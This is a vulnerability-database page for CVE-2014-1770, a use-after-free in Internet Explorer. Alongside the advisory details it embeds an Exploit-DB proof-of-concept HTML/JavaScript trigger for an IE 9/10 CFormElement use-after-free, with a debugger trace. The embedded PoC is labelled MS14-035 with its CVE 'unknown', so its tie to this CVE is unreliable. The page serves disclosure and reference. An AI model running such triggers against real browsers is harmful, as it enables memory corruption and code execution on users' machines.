CVE-2014-1770 : Detail

CVE-2014-1770

43.74%V4
Network
2014-05-22
08h00 +00:00
2018-10-12
17h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Use-after-free vulnerability in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript code that interacts improperly with a CollectGarbage function call on a CMarkup object allocated by the CMarkup::CreateInitialMarkup function.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 34010

Publication date : 2014-07-07 22h00 +00:00
Author : Drozdova Liudmila
EDB Verified : No

<!-- Exploit Title: MS14-035 Internet Explorer CFormElement Use-after-free and memory corruption POC (no crash! see trace) Product: Internet Explorer Vulnerable version: 9,10 Date: 8.07.2014 Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/) Vendor Homepage: http://www.microsoft.com/ Tested on: Window 7 SP1 x86 IE 9,10 CVE : unknown --> <html> <body> <form id="form1"> <input id="input1" type="text" value=""> </form> <script> loaded = false ; function func() { if (loaded) { document.body.innerHTML = "" ; // free CFormElement } } input1 = document.getElementById("input1") ; input1.onclick = func ; loaded = true ; input1.click(); // Call DoClick function </script> </body> </html> <!-- Vulnerability details MSHTML!CInput::DoClick 66943670 8bcf mov ecx,edi 66943672 ff751c push dword ptr [ebp+1Ch] 66943675 ff7518 push dword ptr [ebp+18h] 66943678 ff7514 push dword ptr [ebp+14h] 6694367b ff7510 push dword ptr [ebp+10h] 6694367e ff750c push dword ptr [ebp+0Ch] 66943681 ff7508 push dword ptr [ebp+8] <---- esi = CFormElement 66943684 e856e4f3ff call MSHTML!CElement::DoClick (66881adf) <--- call of func() in javascript, free esi 66943689 85db test ebx,ebx 6694368b 7408 je MSHTML!CInput::DoClick+0x74 (66943695) 6694368d 83666400 and dword ptr [esi+64h],0 ds:0023:0034cd84=00000001 ; memory corruption, write to freed memory 66943691 836668fe and dword ptr [esi+68h],0FFFFFFFEh ; memory corruption, write to freed memory MSHTML!CInput::DoClick+0x60: 66943681 ff7508 push dword ptr [ebp+8] ss:0023:023ec994=00000000 0:005> p eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540 eip=66943684 esp=023ec95c ebp=023ec98c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 MSHTML!CInput::DoClick+0x63: 66943684 e856e4f3ff call MSHTML!CElement::DoClick (66881adf) 0:005> dds esi l1 0034cd20 6661ead8 MSHTML!CFormElement::`vftable' 0:005> !heap -x esi <-- esi contains valid pointer to CFormElement Entry User Heap Segment Size PrevSize Unused Flags ----------------------------------------------------------------------------- 0034cd18 0034cd20 00270000 002fcee8 78 - c LFH;busy 0:005> p eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540 eip=66943689 esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 MSHTML!CInput::DoClick+0x68: 66943689 85db test ebx,ebx 0:005> dds esi l1 0034cd20 6661005c MSHTML!CSVGPathSegCurvetoCubicAbs::`vftable'+0x12c 0:005> !heap -x esi <-- esi contains freed pointer to CFormElement Entry User Heap Segment Size PrevSize Unused Flags ----------------------------------------------------------------------------- 0034cd18 0034cd20 00270000 002fcee8 78 - 0 LFH;free 0:005> p eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540 eip=6694368b esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 MSHTML!CInput::DoClick+0x6a: 6694368b 7408 je MSHTML!CInput::DoClick+0x74 (66943695) [br=0] 0:005> p eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540 eip=6694368d esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 MSHTML!CInput::DoClick+0x6c: 6694368d 83666400 and dword ptr [esi+64h],0 ds:0023:0034cd84=00000001 -->

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 6

Microsoft>>Internet_explorer >> Version 7

Microsoft>>Internet_explorer >> Version 8

Microsoft>>Internet_explorer >> Version 9

Microsoft>>Internet_explorer >> Version 10

Microsoft>>Internet_explorer >> Version 11

References

http://www.securitytracker.com/id/1030266
Tags : vdb-entry, x_refsource_SECTRACK
http://www.kb.cert.org/vuls/id/239151
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/67544
Tags : vdb-entry, x_refsource_BID